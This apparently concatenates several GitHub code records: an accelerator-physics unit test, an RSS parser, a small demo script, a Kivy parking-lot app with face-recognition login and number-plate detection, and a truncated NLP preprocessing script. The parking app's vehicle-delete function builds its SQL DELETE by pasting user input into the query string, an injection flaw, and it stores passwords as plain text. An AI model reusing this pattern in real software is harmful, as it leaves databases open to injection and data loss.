test_ParameterScannerFile_init_from_parameter_scanner(tmp_path):\n\n b1 = SBend(l=0.5, angle=-0.5)\n cell = [Marker(MARKER_NAMES[0]), b1, Marker(MARKER_NAMES[1])]\n\n magnetic_lattice = MagneticLattice(cell, method={\"global\": SecondTM})\n\n with ParameterScanFile(tmp_path / FILENAME, \"w\") as f:\n pscanner = ParameterScanner(Navigator(magnetic_lattice),\n PARAMETER_VALUES,\n PARRAY0S,\n PARAMETER_NAME,\n [Marker(n) for n in MARKER_NAMES]\n )\n\n f.init_from_parameter_scanner(pscanner)\n\n parray0s = f.parray0s()\n assert_parray_equality(next(parray0s), PARRAY0S[0])\n assert_parray_equality(next(parray0s), PARRAY0S[1])\n assert f.parameter_name == PARAMETER_NAME\n assert f.parameter_values == PARAMETER_VALUES\n assert f.marker_names == set(MARKER_NAMES)\n","repo_name":"ocelot-collab/ocelot","sub_path":"unit_tests/cpbd/test_io.py","file_name":"test_io.py","file_ext":"py","file_size_in_byte":3819,"program_lang":"python","lang":"en","doc_type":"code","stars":73,"dataset":"github-code","pt":"53"} +{"seq_id":"25791627235","text":"from collections import namedtuple\n\nimport feedparser\n\n# cached version to have predictable results for testing\nFEED_URL = \"http://bit.ly/2IkFe9B\"\n\nGame = namedtuple('Game', 'title link')\n\n\ndef get_games():\n \"\"\"Parses Steam's RSS feed and returns a list of Game namedtuples\"\"\"\n feeds = feedparser.parse(FEED_URL).entries\n result = []\n\n # return Game(title=)\n\n for item in feeds:\n data = Game(title=item.title, link=item.link)\n result.append(data)\n return result\n\nprint(get_games())","repo_name":"lotlordx/CodeGroffPy","sub_path":"feed_parser.py","file_name":"feed_parser.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74834295849","text":"#!/usr/bin/python\n\nimport random\n\nINGREDIENTS = ['egg', 'sausage', 'bacon', 'ham', 'crumpets', 'spam']\n\ndef prepare_menu_item(ingredient, with_spam=True):\n if with_spam:\n return 'spam ' + ingredient\n return ingredient\n\ndef main():\n print('Scene: A cafe. A man and his wife enter.')\n print('Man: Well, what\\'ve you got?')\n menu = []\n for ingredient in INGREDIENTS:\n has_spam = random.choice([True, False])\n menu.append(prepare_menu_item(ingredient, with_spam=has_spam))\n print('Waitress: Well, there\\'s', ', '.join(menu))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"PacktPublishing/Mastering-Vim-Second-Edition","sub_path":"Chapter01/spam.py","file_name":"spam.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26995305392","text":"from kivy.app import App\r\nfrom kivy.uix.boxlayout import BoxLayout\r\nfrom kivy.uix.screenmanager import ScreenManager, Screen\r\nfrom kivy.core.window import Window\r\nfrom kivy.uix.button import Button\r\nfrom kivy.uix.label import Label\r\nfrom kivy.uix.textinput import TextInput\r\nfrom kivy.uix.popup import Popup\r\nimport sqlite3\r\nfrom kivy.lang import Builder\r\nimport os\r\nimport cv2\r\nimport numpy as np\r\nimport tensorflow as tf\r\nimport sys\r\nimport pytesseract\r\nimport pyttsx3\r\nfrom PIL import Image\r\n\r\nfrom utils import label_map_util\r\nfrom utils import visualization_utils as vis_util\r\nsys.path.append(\"..\")\r\n\r\npytesseract.pytesseract.tesseract_cmd ='C:/Program Files (x86)/Tesseract-OCR/tesseract.exe'\r\nMODEL_NAME = 'inference_graph'\r\nVIDEO_NAME = 'park.mp4'\r\nCWD_PATH = os.getcwd()\r\nPATH_TO_CKPT = os.path.join(CWD_PATH,MODEL_NAME,'frozen_inference_graph.pb')\r\n\r\n\r\nPATH_TO_LABELS = os.path.join(CWD_PATH,'training','labelmap.pbtxt')\r\n\r\n\r\nPATH_TO_VIDEO = os.path.join(CWD_PATH,VIDEO_NAME)\r\n\r\n\r\nNUM_CLASSES = 1\r\n\r\n\r\nlabel_map = label_map_util.load_labelmap(PATH_TO_LABELS)\r\ncategories = label_map_util.convert_label_map_to_categories(label_map, max_num_classes=NUM_CLASSES, use_display_name=True)\r\ncategory_index = label_map_util.create_category_index(categories)\r\n\r\n\r\ndetection_graph = tf.Graph()\r\nwith detection_graph.as_default():\r\n od_graph_def = tf.GraphDef()\r\n with tf.gfile.GFile(PATH_TO_CKPT, 'rb') as fid:\r\n serialized_graph = fid.read()\r\n od_graph_def.ParseFromString(serialized_graph)\r\n tf.import_graph_def(od_graph_def, name='')\r\n\r\n sess = tf.Session(graph=detection_graph)\r\n\r\n\r\nimage_tensor = detection_graph.get_tensor_by_name('image_tensor:0')\r\n\r\n\r\ndetection_boxes = detection_graph.get_tensor_by_name('detection_boxes:0')\r\n\r\n\r\ndetection_scores = detection_graph.get_tensor_by_name('detection_scores:0')\r\ndetection_classes = detection_graph.get_tensor_by_name('detection_classes:0')\r\n\r\nnum_detections = detection_graph.get_tensor_by_name('num_detections:0')\r\nWindow.clearcolor = (0.3, 0.3, 0.3, 0.3)\r\nBuilder.load_string('''\r\n:\r\n id: main_win\r\n orientation: \"vertical\"\r\n spacing: 10\r\n space_x: self.size[0]/3\r\n\r\n\r\n canvas.before:\r\n Color:\r\n rgba: (1,1,1,1)\r\n Rectangle:\r\n source:'work.jpg'\r\n size: root.width-350,root.height\r\n pos: self.pos\r\n\r\n BoxLayout:\r\n size_hint_y: None\r\n height: 50\r\n canvas.before:\r\n Color:\r\n rgba: (.9, .5,.4, 1)\r\n Rectangle:\r\n size: self.size\r\n pos: self.pos\r\n Label:\r\n text: \"3RD EYE SECURITY SYSTEM\"\r\n bold: True\r\n size_hint_x: .9\r\n BoxLayout:\r\n orientation: 'vertical'\r\n padding: main_win.space_x, 10\r\n #spacing: 20\r\n Label:\r\n id: sp21\r\n\r\n\r\n Button:\r\n text: \"Login\"\r\n pos_hint:{'center_x': 1.25, 'center_y': 1}\r\n size_hint_y: None\r\n height: 40\r\n background_color: (.9, .5,.4, 1)\r\n background_normal: ''\r\n on_release:root.change_login()\r\n\r\n\r\n Label:\r\n id: sp2\r\n spacing:10\r\n\r\n Button:\r\n text :\"Sign In\"\r\n pos_hint:{'center_x': 1.25, 'center_y': 1}\r\n size_hint_y: None\r\n height: 40\r\n background_color:(.9, .5,.4, 1)\r\n background_normal: ''\r\n on_release:root.change_signup()\r\n Label:\r\n id :sp4\r\n Label:\r\n id :sp5\r\n Button:\r\n text :\"EXIT\"\r\n pos_hint:{'center_x': 1.25, 'center_y': 1}\r\n size_hint_y: None\r\n height: 40\r\n background_color: (.9, .5,.4, 1)\r\n background_normal: ''\r\n on_press:app.stop()\r\n:\r\n id: roll\r\n orientation: \"vertical\"\r\n spacing: 10\r\n space_x: self.size[0]/3\r\n emaill:emaill\r\n pwdl:pwdl\r\n canvas.before:\r\n Color:\r\n rgba: (1,1,1,1)\r\n Rectangle:\r\n source:'work.jpg'\r\n size: root.width-350,root.height\r\n pos: self.pos\r\n BoxLayout:\r\n size_hint_y: None\r\n height: 50\r\n canvas.before:\r\n Color:\r\n rgba: (.9, .5,.4, 1)\r\n Rectangle:\r\n size: self.size\r\n pos: self.pos\r\n Label:\r\n text: \"LOG IN\"\r\n bold: True\r\n size_hint_x: .9\r\n BoxLayout:\r\n orientation: 'vertical'\r\n padding: roll.space_x, 10\r\n #spacing: 20\r\n BoxLayout:\r\n orientation: \"vertical\"\r\n spacing: 1\r\n size_hint_y: None\r\n height: 100\r\n Label:\r\n id:ws\r\n Label:\r\n id:ws1\r\n\r\n TextInput:\r\n id: emaill\r\n hint_text: \"EMail ID\"\r\n size_hint_y:None\r\n height:40\r\n focus:True\r\n multiline: False\r\n pos_hint:{'center_x': 1.25, 'center_y': 0}\r\n Label:\r\n id: info\r\n text: ''\r\n markup: True\r\n size_hint_y: None\r\n height: 20\r\n TextInput:\r\n id: pwdl\r\n hint_text: \"Password\"\r\n size_hint_y:None\r\n height:40\r\n focus:True\r\n multiline: False\r\n password:True\r\n pos_hint:{'center_x': 1.25, 'center_y': 0.3}\r\n\r\n Label:\r\n id: sp\r\n size_hint_y: None\r\n height: 40\r\n Button:\r\n text: \"Done\"\r\n size_hint_y: None\r\n height: 40\r\n background_color: (.9, .5,.4, 1)\r\n background_normal: ''\r\n pos_hint:{'center_x': 1.25, 'center_y': 0.3}\r\n on_release:root.change_mainmenu()\r\n\r\n\r\n Label:\r\n id: sp2\r\n Label:\r\n id :sp3\r\n Label:\r\n id :sp3\r\n Label:\r\n id :sp3\r\n Button:\r\n text :\"Go back\"\r\n size_hint_y: None\r\n height: 40\r\n background_color: (.9, .5,.4, 1)\r\n background_normal: ''\r\n pos_hint:{'center_x': 1.25, 'center_y': 0.3}\r\n on_release:root.change_main()\r\n Label:\r\n id :sp4\r\n Label:\r\n id :sp5\r\n:\r\n id : logged\r\n orientation: \"vertical\"\r\n spacing: 10\r\n space_x: self.size[0]/3\r\n name:name\r\n email:email\r\n pwd:pwd\r\n phone:phone\r\n idd:idd\r\n spz:spz\r\n canvas.before:\r\n Color:\r\n rgba: (1,1,1,1)\r\n Rectangle:\r\n source:'work.jpg'\r\n size: root.width-350,root.height\r\n pos: self.pos\r\n BoxLayout:\r\n size_hint_y: None\r\n height: 50\r\n canvas.before:\r\n Color:\r\n rgba: (.9, .5,.4, 1)\r\n Rectangle:\r\n size: self.size\r\n pos: self.pos\r\n Label:\r\n text: \"SIGN IN\"\r\n bold: True\r\n size_hint_x: .9\r\n BoxLayout:\r\n orientation: 'vertical'\r\n padding: logged.space_x, 5\r\n #spacing: 20\r\n TextInput:\r\n id: name\r\n hint_text: \"Full Name\"\r\n pos_hint:{'center_x': 1.25, 'center_y': 1}\r\n multiline: False\r\n Label:\r\n id: sp2\r\n size_hint_y:None\r\n height:25\r\n TextInput:\r\n id: email\r\n hint_text: \"EMail ID\"\r\n pos_hint:{'center_x': 1.25, 'center_y': 0.9}\r\n multiline: False\r\n Label:\r\n id: sp2\r\n size_hint_y:None\r\n height:25\r\n TextInput:\r\n id: pwd\r\n hint_text: \"Password\"\r\n pos_hint:{'center_x': 1.25, 'center_y': 0.7}\r\n multiline: False\r\n password:True\r\n Label:\r\n id: sp2\r\n size_hint_y:None\r\n height:25\r\n TextInput:\r\n id: phone\r\n hint_text: \"Phone Number\"\r\n pos_hint:{'center_x': 1.25, 'center_y': 0.5}\r\n multiline: False\r\n Label:\r\n id: sp2\r\n size_hint_y:None\r\n height:25\r\n TextInput:\r\n id: idd\r\n hint_text: \"ID-Number\"\r\n pos_hint:{'center_x': 1.25, 'center_y': 0.3}\r\n multiline: False\r\n\r\n Label:\r\n id: sp2\r\n size_hint_y:None\r\n height:50\r\n Button:\r\n text: \"Continue\"\r\n size_hint_y: None\r\n height: 40\r\n background_color: (.06,.45,.45, 1)\r\n background_normal: ''\r\n pos_hint:{'center_x': 1.25, 'center_y': 0.3}\r\n on_release:root.change_mainmenu()\r\n Label:\r\n id: sp2\r\n size_hint_y:None\r\n height:50\r\n Button:\r\n text: \"GO BACK\"\r\n size_hint_y: None\r\n height: 40\r\n background_color: (.9, .5,.4, 1)\r\n background_normal: ''\r\n on_release:root.change_main()\r\n pos_hint:{'center_x': 1.25, 'center_y': 0.3}\r\n Label:\r\n id: spz\r\n size_hint_y:None\r\n height:50\r\n pos_hint:{'center_x': 1.25, 'center_y': 1}\r\n\r\n Label:\r\n id: sp2\r\n size_hint_y:None\r\n height:50\r\n:\r\n id: roll\r\n orientation: \"vertical\"\r\n spacing: 10\r\n space_x: self.size[0]/3\r\n canvas.before:\r\n Color:\r\n rgba: (1,1,1, 1)\r\n Rectangle:\r\n source:'security.jpg'\r\n size: root.width,root.height\r\n pos: self.pos\r\n BoxLayout:\r\n size_hint_y: None\r\n height: 50\r\n canvas.before:\r\n Color:\r\n rgba: (.9, .5,.4, 1)\r\n Rectangle:\r\n size: self.size\r\n pos: self.pos\r\n Label:\r\n text: \"MAIN MENU\"\r\n bold: True\r\n size_hint_x: .9\r\n BoxLayout:\r\n orientation: 'vertical'\r\n padding: roll.space_x, 10\r\n #spacing: 20\r\n Button:\r\n text :\"Register Vehicle\"\r\n size_hint_y: None\r\n height: 40\r\n background_color: (.9, .5,.4, 1)\r\n background_normal: ''\r\n on_release:root.register()\r\n Label:\r\n id :sp4\r\n Label:\r\n id :sp5\r\n Button:\r\n text :\"Delete Registered Vehicle\"\r\n size_hint_y: None\r\n height: 40\r\n background_color: (.9, .5,.4, 1)\r\n background_normal: ''\r\n on_release:root.delete()\r\n Label:\r\n id :sp4\r\n Label:\r\n id :sp5\r\n Button:\r\n text :\"View Known Cars in lot\"\r\n size_hint_y: None\r\n height: 40\r\n background_color: (.9, .5,.4, 1)\r\n background_normal: ''\r\n on_release:root.moni()\r\n Label:\r\n id :sp4\r\n Label:\r\n id :sp5\r\n Button:\r\n text :\"View Unknown Cars in lot\"\r\n size_hint_y: None\r\n height: 40\r\n background_color: (.9, .5,.4, 1)\r\n background_normal: ''\r\n on_release:root.moni()\r\n Label:\r\n id :sp4\r\n Label:\r\n id :sp5\r\n Button:\r\n text :\"Detection on Video\"\r\n size_hint_y: None\r\n height: 40\r\n background_color: (.9, .5,.4, 1)\r\n background_normal: ''\r\n on_release:root.change_video()\r\n Label:\r\n id :sp4\r\n Label:\r\n id :sp5\r\n Button:\r\n text :\"Dectection Of Images\"\r\n size_hint_y: None\r\n height: 40\r\n background_color: (.9, .5,.4, 1)\r\n background_normal: ''\r\n on_release:root.change_picture()\r\n Label:\r\n id :sp4\r\n Label:\r\n id :sp5\r\n Button:\r\n text :\"LOGOUT\"\r\n size_hint_y: None\r\n height: 40\r\n background_color: (.9, .5,.4, 1)\r\n background_normal: ''\r\n on_release:root.change_main()\r\n\r\n:\r\n\r\n id: roll\r\n orientation: \"vertical\"\r\n spacing: 10\r\n space_x: self.size[0]/3\r\n canvas.before:\r\n Color:\r\n rgba: (1,1,1, 1)\r\n Rectangle:\r\n source:'park.jpg'\r\n size: root.width,root.height\r\n pos: self.pos\r\n BoxLayout:\r\n size_hint_y: None\r\n height: 50\r\n canvas.before:\r\n Color:\r\n rgba: (.9, .5,.4, 1)\r\n Rectangle:\r\n size: self.size\r\n pos: self.pos\r\n Label:\r\n text: \"PLAY THE VIDEO\"\r\n bold: True\r\n size_hint_x: .9\r\n BoxLayout:\r\n orientation: 'vertical'\r\n padding: roll.space_x, 10\r\n #spacing: 20\r\n Button:\r\n text :\"Open Video\"\r\n size_hint_y: None\r\n height: 40\r\n background_color: (.9, .5,.4, 1)\r\n background_normal: ''\r\n on_release:root.play()\r\n Label:\r\n id: sp2\r\n size_hint_y:None\r\n height:50\r\n Button:\r\n text :\"Go Back\"\r\n size_hint_y: None\r\n height: 40\r\n background_color: (.9, .5,.4, 1)\r\n background_normal: ''\r\n on_release:root.back()\r\n\r\n:\r\n\r\n id: roll\r\n orientation: \"vertical\"\r\n spacing: 10\r\n space_x: self.size[0]/3\r\n canvas.before:\r\n Color:\r\n rgba: (1,1,1, 1)\r\n Rectangle:\r\n source:'security.jpg'\r\n size: root.width,root.height\r\n pos: self.pos\r\n BoxLayout:\r\n size_hint_y: None\r\n height: 50\r\n canvas.before:\r\n Color:\r\n rgba: (.9, .5,.4, 1)\r\n Rectangle:\r\n size: self.size\r\n pos: self.pos\r\n Label:\r\n text: \"IMAGE RECOGNITION\"\r\n bold: True\r\n size_hint_x: .9\r\n BoxLayout:\r\n orientation: 'vertical'\r\n padding: roll.space_x, 10\r\n #spacing: 20\r\n Button:\r\n text :\"Open Image 1\"\r\n size_hint_y: None\r\n height: 40\r\n background_color: (.9, .5,.4, 1)\r\n background_normal: ''\r\n on_release:root.play1()\r\n Label:\r\n id :sp4\r\n Label:\r\n id :sp5\r\n Button:\r\n text :\"Open Image 2\"\r\n size_hint_y: None\r\n height: 40\r\n background_color: (.9, .5,.4, 1)\r\n background_normal: ''\r\n on_release:root.play2()\r\n Label:\r\n id :sp4\r\n Label:\r\n id :sp5\r\n Button:\r\n text :\"Open Image 3\"\r\n size_hint_y: None\r\n height: 40\r\n background_color: (.9, .5,.4, 1)\r\n background_normal: ''\r\n on_release:root.play3()\r\n Label:\r\n id :sp4\r\n Label:\r\n id :sp5\r\n Button:\r\n text :\"Open Image 4\"\r\n size_hint_y: None\r\n height: 40\r\n background_color: (.9, .5,.4, 1)\r\n background_normal: ''\r\n on_release:root.play4()\r\n Label:\r\n id :sp4\r\n Label:\r\n id :sp5\r\n Button:\r\n text :\"Go Back\"\r\n size_hint_y: None\r\n height: 40\r\n background_color: (.9, .5,.4, 1)\r\n background_normal: ''\r\n on_release:root.back()\r\n''')\r\n\r\n\r\nclass MainWindow(BoxLayout):\r\n def __init__(self, **kwargs):\r\n super().__init__(**kwargs)\r\n\r\n def change_login(self):\r\n recognizer = cv2.face.LBPHFaceRecognizer_create()\r\n recognizer.read('train/trainningData.yml')\r\n faceCascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml');\r\n id = -1\r\n cam = cv2.VideoCapture(0)\r\n cam.set(3, 640)\r\n cam.set(4, 480)\r\n minW = 0.1*cam.get(3)\r\n minH = 0.1*cam.get(4)\r\n while True:\r\n ret, img =cam.read()\r\n gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\r\n faces = faceCascade.detectMultiScale(\r\n gray,\r\n scaleFactor = 1.2,\r\n minNeighbors = 5,\r\n minSize = (int(minW), int(minH)),\r\n )\r\n for(x,y,w,h) in faces:\r\n cv2.rectangle(img, (x,y), (x+w,y+h), (0,255,0), 2)\r\n id, confidence = recognizer.predict(gray[y:y+h,x:x+w])\r\n if (confidence < 75):\r\n id =id\r\n else:\r\n id =\"UNKNOWN\"\r\n cv2.imshow('camera',img)\r\n k = cv2.waitKey(30) & 0xff\r\n if k == 27:\r\n break\r\n cam.release()\r\n cv2.destroyAllWindows()\r\n comd=sqlite3.connect(\"security.db\")\r\n print(\"Opened database successfully\")\r\n cmd=\"SELECT * from Security_g\"\r\n cursor=comd.execute(cmd)\r\n isrecord=0\r\n print(id)\r\n for row in cursor:\r\n if str(id) in row :\r\n isrecord=1\r\n studdd = 1\r\n engine = pyttsx3.init()\r\n engine.say(\"Login Succesful\")\r\n engine.runAndWait()\r\n sa.screen_manager.current = 'four'\r\n \r\n if isrecord==0:\r\n engine = pyttsx3.init()\r\n engine.say(\"Sorry , You are not recognized\")\r\n engine.runAndWait()\r\n sa.screen_manager.current = 'two'\r\n\r\n def change_signup(self):\r\n sa.screen_manager.current = 'three'\r\n\r\nclass pic(BoxLayout):\r\n def __init__(self, **kwargs):\r\n super().__init__(**kwargs)\r\n\r\n\r\n\r\n def play1(self):\r\n IMAGE_NAME = 'example1.jpg'\r\n PATH_TO_IMAGE = os.path.join(CWD_PATH,IMAGE_NAME)\r\n image = cv2.imread(PATH_TO_IMAGE)\r\n image_expanded = np.expand_dims(image, axis=0)\r\n (boxes, scores, classes, num) = sess.run(\r\n [detection_boxes, detection_scores, detection_classes, num_detections],\r\n feed_dict={image_tensor: image_expanded})\r\n\r\n vis_util.visualize_boxes_and_labels_on_image_array(\r\n image,\r\n np.squeeze(boxes),\r\n np.squeeze(classes).astype(np.int32),\r\n np.squeeze(scores),\r\n category_index,\r\n use_normalized_coordinates=True,\r\n line_thickness=8,\r\n min_score_thresh=0.60)\r\n cv2.imshow('Object detector', image)\r\n cv2.waitKey(0)\r\n cv2.destroyAllWindows()\r\n engine = pyttsx3.init()\r\n engine.say(\"Returning back to the main menu\")\r\n engine.runAndWait()\r\n sa.screen_manager.current = 'four'\r\n\r\n def play2(self):\r\n IMAGE_NAME = 'example2.jpg'\r\n PATH_TO_IMAGE = os.path.join(CWD_PATH,IMAGE_NAME)\r\n image = cv2.imread(PATH_TO_IMAGE)\r\n image_expanded = np.expand_dims(image, axis=0)\r\n (boxes, scores, classes, num) = sess.run(\r\n [detection_boxes, detection_scores, detection_classes, num_detections],\r\n feed_dict={image_tensor: image_expanded})\r\n\r\n vis_util.visualize_boxes_and_labels_on_image_array(\r\n image,\r\n np.squeeze(boxes),\r\n np.squeeze(classes).astype(np.int32),\r\n np.squeeze(scores),\r\n category_index,\r\n use_normalized_coordinates=True,\r\n line_thickness=8,\r\n min_score_thresh=0.60)\r\n cv2.imshow('Object detector', image)\r\n cv2.waitKey(0)\r\n cv2.destroyAllWindows()\r\n sa.screen_manager.current = 'four'\r\n\r\n def play3(self):\r\n IMAGE_NAME = 'example3.jpg'\r\n PATH_TO_IMAGE = os.path.join(CWD_PATH,IMAGE_NAME)\r\n image = cv2.imread(PATH_TO_IMAGE)\r\n image_expanded = np.expand_dims(image, axis=0)\r\n (boxes, scores, classes, num) = sess.run(\r\n [detection_boxes, detection_scores, detection_classes, num_detections],\r\n feed_dict={image_tensor: image_expanded})\r\n\r\n vis_util.visualize_boxes_and_labels_on_image_array(\r\n image,\r\n np.squeeze(boxes),\r\n np.squeeze(classes).astype(np.int32),\r\n np.squeeze(scores),\r\n category_index,\r\n use_normalized_coordinates=True,\r\n line_thickness=8,\r\n min_score_thresh=0.60)\r\n cv2.imshow('Object detector', image)\r\n cv2.waitKey(0)\r\n cv2.destroyAllWindows()\r\n sa.screen_manager.current = 'four'\r\n def back(self):\r\n sa.screen_manager.current = 'four'\r\n \r\nclass Login(BoxLayout):\r\n def __init__(self, **kwargs):\r\n super().__init__(**kwargs)\r\n\r\n def change_main(self):\r\n sa.screen_manager.current = 'one'\r\n\r\n def change_mainmenu(self):\r\n sa.screen_manager.current = 'four'\r\n\r\n\r\nclass Signup(BoxLayout):\r\n def __init__(self, **kwargs):\r\n super().__init__(**kwargs)\r\n\r\n def change_main(self):\r\n sa.screen_manager.current = 'one'\r\n\r\n def change_mainmenu(self):\r\n l = []\r\n l.append(self.name.text)\r\n l.append(self.email.text)\r\n l.append(self.pwd.text)\r\n l.append(self.phone.text)\r\n l.append(self.idd.text)\r\n connection = sqlite3.connect(\"security.db\")\r\n crsr = connection.cursor()\r\n crsr.execute(\"INSERT INTO Security_g VALUES (?,?,?,?,?)\", l)\r\n connection.commit()\r\n connection.close()\r\n faceDetect=cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\r\n cam=cv2.VideoCapture(0)\r\n id=self.idd.text\r\n sampleno=0\r\n while(True):\r\n ret, img = cam.read()\r\n gray=cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\r\n faces = faceDetect.detectMultiScale(gray, 1.3, 5)\r\n for(x,y,w,h) in faces:\r\n sampleno+=1\r\n cv2.imwrite('dataset/user.'+str(id)+'.'+str(sampleno)+'.jpg',gray[y:y+h,x:x+w])\r\n cv2.rectangle(img,(x,y),(x+w,y+h),(0,0,255),2)\r\n cv2.imshow(\"face\",img)\r\n cv2.waitKey(1)\r\n if sampleno>15:\r\n break\r\n cam.release() \r\n cv2.destroyAllWindows()\r\n recognizer=cv2.face.LBPHFaceRecognizer_create();\r\n path=\"C:/Tensorflow/models/research/object_detection/dataset\"\r\n\r\n def getImagesWithID(path):\r\n imagePaths=[os.path.join(path,f) for f in os.listdir(path)]\r\n faces=[]\r\n IDs=[]\r\n for imagePath in imagePaths:\r\n faceImg=Image.open(imagePath).convert('L')\r\n faceNp=np.array(faceImg,'uint8')\r\n a=imagePath.split('user')\r\n idd=int(a[1].split('.')[1])\r\n faces.append(faceNp)\r\n IDs.append(idd)\r\n cv2.imshow(\"training\",faceNp)\r\n cv2.waitKey(10)\r\n return np.array(IDs), faces\r\n Ids, faces = getImagesWithID(path)\r\n recognizer.train(faces, np.array(Ids))\r\n recognizer.save('train/trainningData.yml')\r\n cam.release() \r\n cv2.destroyAllWindows() \r\n sa.screen_manager.current = 'four'\r\n \r\n\r\n\r\nclass MainMenu(BoxLayout):\r\n def __init__(self, **kwargs):\r\n super().__init__(**kwargs)\r\n\r\n def change_main(self):\r\n engine = pyttsx3.init()\r\n engine.say(\"Logout Successful\")\r\n engine.runAndWait()\r\n sa.screen_manager.current = 'one'\r\n def change_video(self):\r\n engine = pyttsx3.init()\r\n engine.say(\"Number plate detection on video.\")\r\n engine.runAndWait()\r\n sa.screen_manager.current='five'\r\n\r\n def register(self):\r\n layout = BoxLayout(orientation='vertical')\r\n popupLabel = Label(text=\"Enter Car Number\")\r\n x = Label(text=\"\")\r\n self.text1 = TextInput(hint_text=\"Car Number\")\r\n popupLabel2 = Label(text=\"Enter Owner Name\")\r\n self.text2 = TextInput(hint_text=\"Owner Name\")\r\n popupLabel3 = Label(text=\"Enter Model Type\")\r\n self.text3 = TextInput(hint_text=\"Model Type\")\r\n popupLabel4 = Label(text=\"Enter Color Of the Car\")\r\n self.text4 = TextInput(hint_text=\"Color\")\r\n closeButton = Button(text=\"Register\")\r\n layout.add_widget(popupLabel)\r\n layout.add_widget(self.text1)\r\n layout.add_widget(popupLabel2)\r\n layout.add_widget(self.text2)\r\n layout.add_widget(popupLabel3)\r\n layout.add_widget(self.text3)\r\n layout.add_widget(popupLabel4)\r\n layout.add_widget(self.text4)\r\n layout.add_widget(x)\r\n layout.add_widget(closeButton)\r\n popup = Popup(title='Register Vehicle', content=layout, size_hint=(None, None), size=(400, 400))\r\n popup.open()\r\n closeButton.bind(on_press=self.regis)\r\n\r\n def regis(self, a):\r\n l = []\r\n l.append(self.text1.text)\r\n l.append(self.text2.text)\r\n l.append(self.text3.text)\r\n l.append(self.text4.text)\r\n connection = sqlite3.connect(\"security.db\")\r\n crsr = connection.cursor()\r\n crsr.execute(\"INSERT INTO Details VALUES (?,?,?,?)\", l)\r\n connection.commit()\r\n connection.close()\r\n engine = pyttsx3.init()\r\n engine.say(\"Vehicle is sucessfully registered!\")\r\n engine.runAndWait()\r\n\r\n def delete(self):\r\n layout = BoxLayout(orientation='vertical')\r\n w = Label(text=\"Enter Car Number\")\r\n x = Label(text=\"\")\r\n x1 = Label(text=\"\")\r\n x2 = Label(text=\"\")\r\n self.m = TextInput(hint_text=\"Car Number\")\r\n closeButton = Button(text=\"Close the pop-up\")\r\n layout.add_widget(w)\r\n layout.add_widget(self.m)\r\n layout.add_widget(x)\r\n layout.add_widget(x1)\r\n layout.add_widget(x2)\r\n layout.add_widget(closeButton)\r\n popup = Popup(title='Delete Registered Vehicle', content=layout, size_hint=(None, None), size=(350, 350))\r\n popup.open()\r\n closeButton.bind(on_press=self.dell)\r\n\r\n def dell(self, a):\r\n connection = sqlite3.connect(\"security.db\")\r\n crsr = connection.cursor()\r\n a = \"\"\"Delete from Details where Car_no = \"\"\" + self.m.text\r\n print(a)\r\n crsr.execute(a)\r\n connection.commit()\r\n connection.close()\r\n engine = pyttsx3.init()\r\n engine.say(\"Vehicle is removed from database\")\r\n engine.runAndWait()\r\n\r\n def change_picture(self):\r\n engine = pyttsx3.init()\r\n engine.say(\"Number plate detection on images.\")\r\n engine.runAndWait()\r\n sa.screen_manager.current = 'six'\r\nclass playvideo(BoxLayout):\r\n\r\n def __init__(self, **kwargs):\r\n super().__init__(**kwargs)\r\n\r\n def play(self):\r\n \r\n video = cv2.VideoCapture(PATH_TO_VIDEO)\r\n\r\n while(video.isOpened()):\r\n ret, frame = video.read()\r\n frame_expanded = np.expand_dims(frame, axis=0)\r\n (boxes, scores, classes, num) = sess.run(\r\n [detection_boxes, detection_scores, detection_classes, num_detections],\r\n feed_dict={image_tensor: frame_expanded})\r\n vis_util.visualize_boxes_and_labels_on_image_array(\r\n frame,\r\n np.squeeze(boxes),\r\n np.squeeze(classes).astype(np.int32),\r\n np.squeeze(scores),\r\n category_index,\r\n use_normalized_coordinates=True,\r\n line_thickness=8,\r\n min_score_thresh=0.90)\r\n cv2.imshow('Object detector', frame)\r\n if (cv2.waitKey(1) & 0xFF == ord('q')):\r\n break\r\n video.release()\r\n cv2.destroyAllWindows()\r\n def back(self):\r\n sa.screen_manager.current = 'four'\r\n \r\n\r\nclass MyApp(App):\r\n\r\n def build(self):\r\n self.screen_manager = ScreenManager()\r\n\r\n self.one = MainWindow()\r\n screen = Screen(name=\"one\")\r\n screen.add_widget(self.one)\r\n self.screen_manager.add_widget(screen)\r\n\r\n self.two = Login()\r\n screen = Screen(name=\"two\")\r\n screen.add_widget(self.two)\r\n self.screen_manager.add_widget(screen)\r\n\r\n self.three = Signup()\r\n screen = Screen(name=\"three\")\r\n screen.add_widget(self.three)\r\n self.screen_manager.add_widget(screen)\r\n\r\n self.four = MainMenu()\r\n screen = Screen(name=\"four\")\r\n screen.add_widget(self.four)\r\n self.screen_manager.add_widget(screen)\r\n\r\n self.five = playvideo()\r\n screen = Screen(name='five')\r\n screen.add_widget(self.five)\r\n self.screen_manager.add_widget(screen)\r\n\r\n self.six = pic()\r\n screen = Screen(name='six')\r\n screen.add_widget(self.six)\r\n self.screen_manager.add_widget(screen)\r\n\r\n return self.screen_manager\r\n\r\n\r\nif __name__ == \"__main__\":\r\n sa = MyApp()\r\n sa.run()\r\n","repo_name":"karan650g/Automated-Parking-Solution","sub_path":"WeWillWin.py","file_name":"WeWillWin.py","file_ext":"py","file_size_in_byte":29066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40212590696","text":"import pandas as pd\nimport numpy as np\nimport re\nimport contractions\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import RegexpTokenizer\n#Load data\noffice_data = pd.read_excel(\"/Users/jonzimmerman/Desktop/Data Projects/The Office NLP/the-office-lines.xlsx\")\n\n\n\ndef lemmatize(text):\n lemmed = contractions.fix(str(text))\n return lemmed\n\n\ndef removeStopWords(str):\n#select english stopwords\n cachedStopWords = set(stopwords.words(\"english\"))\n#add custom words\n cachedStopWords.update(('like','um','uh','oh',' s ','and','i','I','a','and','so','this','when','it','many','so','cant','yes','no','these'))\n#remove stop words\n new_str = ' '.join([word for word in str.split() if word not in 